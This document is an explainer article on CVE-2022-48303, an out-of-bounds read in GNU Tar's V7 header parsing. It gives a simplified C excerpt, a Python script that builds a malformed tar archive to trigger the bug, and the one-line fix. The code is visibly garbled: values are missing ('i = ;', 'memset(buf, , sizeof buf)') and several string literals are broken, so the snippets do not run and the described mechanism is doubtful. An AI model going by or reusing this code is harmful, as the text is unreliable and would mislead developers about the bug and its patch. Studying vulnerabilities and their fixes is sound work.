GNU Tar is one of the most trusted tools in Linux for archiving and extracting files. It’s been around for decades, and is the backend for many packaging and backup systems. But in 2022, a subtle security bug—CVE-2022-48303—was discovered which could potentially affect anyone using GNU Tar up to version 1.34.

This is a hands-on, straight-talk guide to what happened, why it matters, and what you need to know.

What Is CVE-2022-48303?

Let’s break it down. CVE-2022-48303 is about a one-byte out-of-bounds read in GNU Tar through version 1.34. This sounds highly technical, but it means the program might read a single byte past where it’s supposed to. Worse, that byte isn’t properly initialized, which could (in theory) make Tar behave unpredictably.

No one has demonstrated a way to make this bug do something dramatic, like run arbitrary code. Still, it’s a data leak, it‘s a code-quality concern, and it’s an opportunity to learn from a real bug that got a CVE.

Where Did the Bug Live?

The root of the issue is in the from_header function in list.c. It only gets triggered with certain old-school tar archive formats, namely the V7 format (from Version 7 Unix!). Specifically, it trips up if an archive’s mtime (modification time) field is loaded with about 11 whitespace characters.

When Tar tries to parse the header, it expects numeric data. Too much whitespace can make Tar run past the end of its expected data, touching one extra, potentially unsafe memory byte.

Getting Hands-On: The Code

Here’s the critical snippet—cleaned up and commented for clarity—from list.c in the GNU Tar sources:

// Original in 'list.c', simplified:
static time_t
from_header (const char *where, int digs)
{
  char buf[21];
  char *p = buf;
  int i;

  // Copy 'digs' characters to buf
  for (i = ; i < digs; i++)
    {
      if (where[i] == ' ')
        continue; // Skip whitespace
      *p++ = where[i];
    }
  *p = '\';

  // Convert to number (this is where uninitialized buf could be used!)
  return strtol (buf, NULL, 8);
}

If the where buffer is all spaces, buf might stay uninitialized (or partially so), and then you pass it to strtol. That’s undefined behavior.

Demonstrating the Bug

Until now, nobody has shown how this bug can break into arbitrary code execution. But you could, at minimum, get Tar to read junk memory—possibly leaking a byte. In rare situations, that might cause a crash or weird program behavior.

You can trigger the bug by crafting a tar file with a V7 header where the mtime (modification time) is about 11 spaces long:

with open("badv7tar.tar", "wb") as f:
    # Construct a V7 header with mtime as 11 spaces
    header = b"file1.txt" + b"\"*(100 - 9)
    header += b"0000644" + b"\"  # mode
    header += b"000175" + b"\"  # uid
    header += b"000175" + b"\"  # gid
    header += b"00000000001" + b"\"  # size
    header += b"           "  # 11 spaces for mtime
    header += b" \"  # chksum placeholder
    header += b""  # typeflag
    header += b"\"*355  # rest of 512-byte header
    f.write(header.ljust(512, b"\"))
    f.write(b"a")  # A single byte for the file content
    f.write(b"\" * (512 - 1))  # Pad out to the next block

Now, running tar might look like this

tar tf badv7tar.tar

Depending on platform and build, you may get weird output or a read of an uninitialized byte, but not a “crash or hack.”

- CVE-2022-48303 at NVD
- GNU Tar Source Code
- Upstream Patch – How the GNU Tar maintainers fixed it

Should I Panic?

No. As of this writing, there’s no exploit in the wild, and no one has shown a way to leverage this for a real attack. But it’s still a bug. Future researchers might find new tricks, and you might as well patch.

Most distributions have already shipped fixed packages. If you’re using GNU Tar 1.35 or higher, you’re safe from this one.

How Was It Fixed?

The fix is straightforward—making sure the buffer is always initialized, so even if it’s just spaces, you don’t get uninitialized reads.

From the patch

memset (buf, , sizeof buf); // Always zero the buffer

This is a good habit: Always initialize buffers before you use them.

Sloppy input handling and uninitialized variables are still common problems, even in mature code.

- For sysadmins and devs: Always keep your tools up to date, and don’t assume old formats can’t trip up modern code.


If you want to dig deeper or see the patch yourself, check out the resources above.  
Have more questions? Here's the official tar bug tracker.

Timeline

Published on: 01/30/2023 04:15:00 UTC
Last modified on: 03/27/2023 00:15:00 UTC